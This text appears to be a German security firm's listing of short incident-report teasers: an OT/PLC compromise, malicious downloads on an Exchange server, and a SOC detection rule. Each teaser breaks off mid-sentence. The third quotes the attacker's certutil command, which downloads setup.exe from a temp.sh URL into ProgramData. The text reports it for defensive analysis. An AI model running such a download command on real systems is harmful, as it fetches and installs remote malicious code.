In einem unserer jüngsten Kundenfälle wurden die OT-Systeme eines deutschen Unternehmens von Hackern angegriffen und kompromittiert. Die Angreifer nutzten dafür eine Schwachstelle in einem industriellen Steuerungscomputer (PLC) aus, um Zugriff auf die OT-Systeme zu erlangen und diese zu manipulieren. Wir reagierten schnell und instruierten den Kunden, sofort seine Incident-Response-Pläne zu

Auf dem Exchange-Server eines Kunden haben wir mehrere ungewöhnliche Aktivitäten festgestellt. Dort wurden schädliche Downloads beobachtet und Endpoint Protection Warnungen von „Symantec Network Protection“ ausgelöst. Auch Veränderungen am System, wie die Installation von schädlicher Software mit dem Pfad „C:\setup.exe“ waren ein Resultat unserer Analyse. Doch wie ist es zu diesem

Die SOC-Experten unserer Leitstelle haben kürzlich folgenden bedrohlichen Vorfall bei einem Kunden entdeckt. Über die Regel „Suspicious Certutil Command“ wurden sie auf den verdächtigen Befehl „C:\Windows\system32\cmd.exe /c certutil.exe -urlcache -f https://temp.sh/OkXnS/setup.exe C:\programdata\setup.exe >> C:\Windows\TEMP\tmpE338.tmp 2>&1” aufmerksam, der auf einem Exchange-Server ausgeführt wurde. Der ausgeführte Befehl enthält den Parameter „-urlcache“, gefolgt